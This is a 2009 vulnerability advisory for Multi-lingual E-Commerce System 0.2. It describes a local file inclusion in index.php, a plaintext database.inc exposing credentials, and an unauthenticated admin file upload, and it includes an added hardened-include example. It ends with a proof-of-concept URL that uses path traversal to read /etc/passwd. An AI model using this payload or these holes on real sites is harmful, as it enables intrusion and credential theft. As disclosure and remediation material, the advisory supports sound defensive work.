******* Salvatore "drosophila" Fresta *******
[+] Application: Multi-lingual E-Commerce System
[+] Version: 0.2
[+] Website: http://sourceforge.net/projects/mlecsphp/
[+] Bugs: [A] Local File Inclusion
[B] Information Disclosure
[C] Arbitrary File Upload
[+] Exploitation: Remote
[+] Date: 19 Apr 2009
[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@gmail.com
*************************************************
[+] Menu
1) Bugs
2) Code
3) Fix
*************************************************
[+] Bugs
- [A] Local File Inclusion
[-] Risk: high
[-] File affected: index.php
This bug allows a guest to include local files.
The following is the vulnerable code:
...
if (isset($_GET['lang'])) { $_SESSION['lang'] = $_GET['lang'];}
...
include($include_path.'/inc/'.$_GET['page'].'-'.$_SESSION['lang'].'.php');
?>
...
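As an added example (not code from the advisory or from the project), a hardened replacement for the include() shown above: the page and language names are accepted only if they match an allowlist, and the resolved path is checked to remain inside inc/ before it is included. The allowlist entries and $include_path = __DIR__ are assumptions for illustration.

```php
<?php
// Added example, not the project's code: hardened version of the include()
// in index.php. Neither $_GET['page'] nor $_SESSION['lang'] can carry "../"
// or a different extension into the include path, because only exact
// allowlist matches are used.
session_start();

$include_path  = __DIR__;                                   // assumed; the original defines it elsewhere
$allowed_pages = array('home', 'products', 'cart', 'contact'); // assumed page names
$allowed_langs = array('en', 'it', 'de');                      // assumed language codes

// Return $value only if it is a string that exactly matches an allowlist
// entry; anything else (traversal sequences, null bytes, unknown names)
// falls back to $default.
function pick(array $allowed, $value, $default)
{
    return (is_string($value) && in_array($value, $allowed, true))
        ? $value : $default;
}

if (isset($_GET['lang'])) {
    $_SESSION['lang'] = pick($allowed_langs, $_GET['lang'], 'en');
}
$lang = pick($allowed_langs, isset($_SESSION['lang']) ? $_SESSION['lang'] : 'en', 'en');
$page = pick($allowed_pages, isset($_GET['page']) ? $_GET['page'] : 'home', 'home');

// Second line of defence: resolve the final path and confirm it still lies
// inside the intended directory before including it.
$inc_dir = realpath($include_path . '/inc');
$target  = ($inc_dir === false) ? false
         : realpath($inc_dir . '/' . $page . '-' . $lang . '.php');
if ($target === false
    || strncmp($target, $inc_dir . DIRECTORY_SEPARATOR, strlen($inc_dir) + 1) !== 0) {
    http_response_code(404);
    exit;
}
include $target;
```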
- [B] Information Disclosure
[-] Risk: medium
[-] File affected: database.inc
This file contains sensitive information such as
the username and the password for connecting to
the database. Because the file has only the .inc
extension, its content is served to the browser as
plain text.
- [C] Arbitrary File Upload
[-] Risk: medium
[-] File affected: product_image.php
None of the files in the admin directory check
whether the user has admin privileges, so a guest
can execute the files contained in this directory.
product_image.php contains a form that allows files
to be uploaded to the system but performs no check
on the file extension, so a user can upload
arbitrary files.
*************************************************
[+] Code
- [A] Local File Inclusion
http://www.site.com/path/index.php?page=../../../../../etc/passwd